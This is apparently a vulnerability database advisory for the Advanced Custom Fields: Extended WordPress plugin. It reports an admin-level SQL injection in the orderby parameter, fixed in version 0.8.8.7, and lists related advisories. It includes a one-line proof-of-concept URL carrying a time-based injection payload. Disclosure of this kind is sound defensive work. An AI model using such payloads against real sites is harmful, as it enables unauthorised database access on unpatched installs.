WordPress Plugin Vulnerabilities

Advanced Custom Fields: Extended < 0.8.8.7 - Admin+ SQL Injection

Description

The plugin does not validate the order and orderby parameters before using them in a SQL statement, leading to a SQL Injection issue

Proof of Concept

https://example.ocm/wp-admin/options-general.php?page=acfe-options&orderby=1%20and%20sleep(0.02)%23

Affects Plugins

Plugin icon
acf-extended
Fixed in 0.8.8.7

References

CVE
CVE-2021-24865
URL
https://plugins.trac.wordpress.org/changeset/2648200

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Verified
Yes
WPVDB ID
055a2dcf-77ec-4e54-be7d-9c47f7730d1b

Timeline

Publicly Published
2021-12-24 (about 2 years ago)
Added
2021-12-24 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2023-10-30
Title
Message ticker < 9.3 - Authenticated (Subscriber+) SQL Injection via Shortcode
Published
2024-03-13
Title
Automatic < 3.92.1 - Unauthenticated SQL Injection
Published
2021-07-27
Title
Side Menu Lite < 2.2.6 - Authenticated SQL Injection
Published
2023-08-11
Title
Donations Made Easy - Smart Donations <= 4.0.12 - Admin+ SQLi
Published
2014-08-01
Title
Zingiri Web Shop - Cookie SQL Injection